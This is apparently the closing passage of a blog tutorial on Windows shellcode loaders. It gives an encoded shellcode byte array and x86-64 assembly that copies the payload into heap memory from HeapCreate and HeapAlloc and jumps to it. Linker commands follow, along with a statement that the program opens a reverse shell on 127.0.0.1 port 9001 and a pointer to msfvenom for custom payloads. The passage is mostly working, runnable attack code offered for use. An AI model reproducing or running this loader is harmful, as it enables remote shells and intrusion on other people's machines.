0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

; both of these are conveniently in kernel32.dll ;)
extern HeapCreate
extern HeapAlloc

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
	
xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate
sub rsp, 72
mov [rsp], rax
add rsp, 72
xor rcx, rcx
	
mov r8, encoded_shellcode_total ;size of shellcode
mov edx,8  
mov rcx,qword [rsp - 72]  
call HeapAlloc
push rax
pop rdx ; memory address of mapped region of memory
	
lea rsi, [rel encoded_shellcode]
mov ecx, encoded_shellcode_total
mov r14, rdx ; save for later
xor rax, rax
	
chunk_reader:
    
mov al, byte [rsi]
mov [rdx], al
inc rsi
test rcx, rcx
jz final
inc rdx
loop chunk_reader
    
final:
jmp r14

For now, we have to compile this into a PE executable to run it as it’s not ready to be compiled into shellcode just yet. Soon though :) Here’s how you can accomplish that. I use the ld.exe linker on windows. You can do this on Linux too if you like. You’ll want to download mingw64 first too of course. You can download the exact version of mingw64 I use here:

mingw64

the LD.exe linker executable will be located in the extracted BIN subdirectory: C:\mingw64\bin

Finally, here’s the command to compile our full source code above: ld.exe -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib -o mem_mapper_pic.exe mem_mapper_pic.obj -lkernel32

Run the above compiled .exe and you should get your reverse shell on 127.0.0.1 port 9001. feel free to change the shellcode if you like. I encoded mine but you can also use msfvenom to insert your own custom shellcode too! Consider it a homework exercise 😺

Okay that’s a wrap for Part 1. Stay tuned for Part 2, and as always thanks for reading and I hope this was helpful and insightful.

Leave a comment